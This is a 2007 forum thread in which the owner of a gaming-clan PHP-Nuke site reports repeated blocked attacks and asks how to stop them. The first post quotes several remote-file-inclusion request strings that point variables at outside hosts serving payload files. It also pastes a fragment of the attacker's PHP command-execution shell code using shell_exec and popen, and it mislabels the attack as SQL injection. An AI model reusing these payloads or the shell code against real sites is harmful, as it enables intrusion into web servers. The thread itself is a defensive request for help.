View Full Version : Site under attack - Get posts

11-11-2007, 07:48 PM
I'm relatively new to website and php. I run a website for my gaming community- www.clanpraetorian.net.

I have PHP nuke running on the site with nuke sentinel. All updated etc..
and sentinel keeps blocking this ip and access here is what line is being blocked. so far I've banned/blocked 1055 of his attempts.

Get String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?

Query String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?

Post String: www.clanpraetorian.net/modules.php

That particular one comes up Germany

It's pretty obvious to me he's trying to activate this txt file for sql injection? He got me once already but i fixed the problem and he can't mess with the files. my question is how can i block the get string? or should i? I can't block his ip he's either using a proxy or moving around countries very fast :) . What i think i need is something in the htaccess file maybe?

Thanks for any help

Heres a couple of other blocks
Get String: www.clanpraetorian.net/modules.php?name=SQuery/SQuery/lib/gore.php?libpath=http://theninjalegion.com/safeon.txt??
Get String: www.clanpraetorian.net/modules.php?name=vwar//modules/vwar/admin/admin.php?vwar_root=
Get String: www.clanpraetorian.net/modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kolortavil.org/Connections/ok.txt?

Here is txt file he is using for one site... http://www.kolortavil.org/Connections/ok.txt?

echo "Mic22";
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
$res = join("\n",$res);
$res = @shell_exec($cfe);
$res = @ob_get_contents();
$res = @ob_get_contents();
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
return $res;

11-11-2007, 08:09 PM
All your links redirect to the FBI's website...?

11-11-2007, 08:34 PM
no, lol

Thats nuke sentinel blocking you. Fixed.. but it'll just ban you.

11-11-2007, 08:51 PM
Have you checked PHPNukes site for updates/patches?

11-11-2007, 09:08 PM
I have PHP nuke running on the site with nuke sentinel. All updated etc..


11-14-2007, 06:21 AM
No more ideas?